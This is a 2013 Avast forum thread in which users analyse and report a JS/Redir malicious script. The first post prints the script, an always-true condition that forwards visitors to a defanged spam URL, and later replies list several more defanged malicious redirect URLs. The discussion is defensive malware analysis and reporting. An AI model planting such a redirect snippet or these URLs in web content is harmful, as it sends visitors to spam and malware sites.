Avast WEBforum

Other => Viruses and worms => Topic started by: polonus on January 16, 2013, 05:55:28 PM

Title: Is this JS/Redir being detected?
Post by: polonus on January 16, 2013, 05:55:28 PM
See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
Detected via a file viewer was the following JS/Redir code
See code:
Code: [Select]
<  sc​ript >
10: var1=49;
11: var2=var1;
12: if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
13: < / sc​ript >
Read on this:  http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (link post: Posted by Conrad Longmore)
Please wait a moment ... You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus
Title: Re: Is this JS/Redir being detected?
Post by: !Donovan on January 16, 2013, 06:53:16 PM
Hi Polonus,

This technique is used with various URLs. A search on Google included:
Code: [Select]
hXtp://ukr.net
hXtp://topsearch10.com/search.php?aid=62756&q=home+jobs
hXtp://popka-super.ru
hXtp://realstarsearch.com/search.php?q=runescape+automine
hXtp://zaebiz.info
hXtp://global-advers.com/soft.php?aid=0153&d=2&product=XPA
hXtp://www.mp3sugar.com/?aff=2081
hXtp://evamendesochka.com/go.php?sid=9
hXtp://catalog--sites.info/sea
hXtp://yahhooo.info/search.php?q=ritalin&tpl=forbot

Do you see the pattern?
~!Donovan
Title: Re: Is this JS/Redir being detected?
Post by: Pondus on January 16, 2013, 09:36:51 PM
not detected......  will upload sample to avast lab   ;)

VirusTotal
https://www.virustotal.com/file/f4ff9fbb00a204237f0f3cf8b87cc63ceb105003910cda53eb46719f2cabb374/analysis/1358368480/
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 16, 2013, 10:10:05 PM
Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the "If var1 Equals var2 Then Redirect!" pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (link article author !Donovan),

polonus
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 17, 2013, 03:41:42 PM
There more variants on the same theme, see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (link author = Author: Adam Khoury ) and the malcode could also be combined with particular escape characters  and through malicious spacing code....

polonus
Title: Re: Is this JS/Redir being detected?
Post by: !Donovan on January 17, 2013, 05:59:53 PM
Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan
Title: Re: Is this JS/Redir being detected?
Post by: polonus on January 17, 2013, 09:03:39 PM
Hi !Donovan,

Good you alerted us to that. Seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on  VirusWatch Archives and then I just fed the uri's to redleg's fileviewer as I later reported to virus AT avast dot com. In a NoScript protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam click related malcode...

polonus
Title: Re: Is this JS/Redir being detected?
Post by: Pondus on January 17, 2013, 09:12:14 PM
the URL  hhac.net/upload.htm  is now down....